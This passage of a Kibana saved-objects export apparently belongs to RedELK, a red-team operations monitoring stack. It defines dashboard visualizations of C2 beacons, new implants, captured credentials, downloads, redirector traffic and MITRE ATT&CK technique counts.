"search"}], "sort": [1645363346672, 1199], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Redirector traffic alarmed IP total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Alarmed IP\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Redirector traffic alarmed IP total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1201], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Beacons per host", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":999,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Beacons per host\"}"}, "coreMigrationVersion": "7.16.3", "id": "632081a0-d02a-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1203], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots per user tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Screenshots per user tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "659280b0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1205], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Beacons per user", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":999,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Beacons per user\"}"}, "coreMigrationVersion": "7.16.3", "id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1207], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Alarmed IOC total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Alarmed IOC\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Alarmed IOC total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1209], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Downloads\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-4w\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\",\"defaultYExtents\":false,\"setYExtents\":false},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Downloads\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Downloads\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - CS - Downloads over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "85446c80-d04b-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1211], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Top new implants by ext IP address and scenario", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of new implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.ip_ext\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Redirector IP\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"infra.attack_scenario\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Scenario\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"isDonut\":false,\"labels\":{\"show\":true,\"values\":true,\"last_level\":false,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Top new implants by ext IP address and scenario\"}"}, "coreMigrationVersion": "7.16.3", "id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1645363346672, 1214], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - TTP Cloud Tag", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"IDs\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"threat.technique.id\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other TTPs\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"TTP\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - TTP Cloud Tag\"}"}, "coreMigrationVersion": "7.16.3", "id": "88db1280-d024-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1216], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"c2.log.type: \\\"implant_newimplant\\\" AND (NOT tags: testsystems_V* )\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "title": "RedELK - Top users with new implants", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Top users with new implants\",\"type\":\"pie\",\"params\":{\"type\":\"pie\",\"addTooltip\":false,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"size\":20,\"order\":\"desc\",\"orderBy\":\"1\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}]}"}, "coreMigrationVersion": "7.16.3", "id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1645363346672, 1218], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks per host and user", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other users\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other hosts\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Tasks per host and user\"}"}, "coreMigrationVersion": "7.16.3", "id": "a5554e20-d025-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1220], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Credentials captured\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Credentials captured\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Credentials captured\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Credentials over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "ab609c60-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1222], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Techniques tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"signal.rule.threat.technique.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":300,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":14,\"maxFontSize\":58,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - MITRE ATT&CK Techniques tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "abdcd940-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1224], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks per C2 operator", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Tasks launched\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-1d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Unknown user\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Tasks launched\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Tasks launched\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Tasks launched per operator\"}"}, "coreMigrationVersion": "7.16.3", "id": "afb6ce00-d022-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1226], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Hosts total unique count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"2\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"host.name\",\"customLabel\":\"Hosts\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Hosts total unique count\"}"}, "coreMigrationVersion": "7.16.3", "id": "b19d4790-d35f-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1228], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Downloads\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - CS - Downloads total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1230], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic over time\",\"type\":\"line\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"filters\",\"params\":{\"filters\":[{\"input\":{\"query\":\"redir.backend.name : c2* and tags : \\\"iplist_customer\\\"\",\"language\":\"kuery\"},\"label\":\"C2 traffic - Customer\"},{\"input\":{\"query\":\"redir.backend.name : c2* and tags : \\\"iplist_redteam\\\" \",\"language\":\"kuery\"},\"label\":\"C2 traffic - Red team tests\"},{\"input\":{\"query\":\"redir.backend.name : c2* and not tags: \\\"iplist_customer\\\" and not tags : \\\"iplist_redteam\\\" \",\"language\":\"kuery\"},\"label\":\"C2 traffic - Other\"},{\"input\":{\"query\":\"not redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"Non-C2 traffic\"}]},\"schema\":\"group\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"date_histogram\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-1w\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}},\"schema\":\"segment\"}],\"params\":{\"type\":\"line\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"line\",\"mode\":\"normal\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"interpolate\":\"linear\",\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true,\"fittingFunction\":\"linear\"}}"}, "coreMigrationVersion": "7.16.3", "id": "be08d380-efe9-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1645363346672, 1232], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic source table", "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic source table\",\"type\":\"table\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{\"customLabel\":\"Hits\"},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.ip\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Source IP\"},\"schema\":\"bucket\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.as.organization.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":1,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"AS 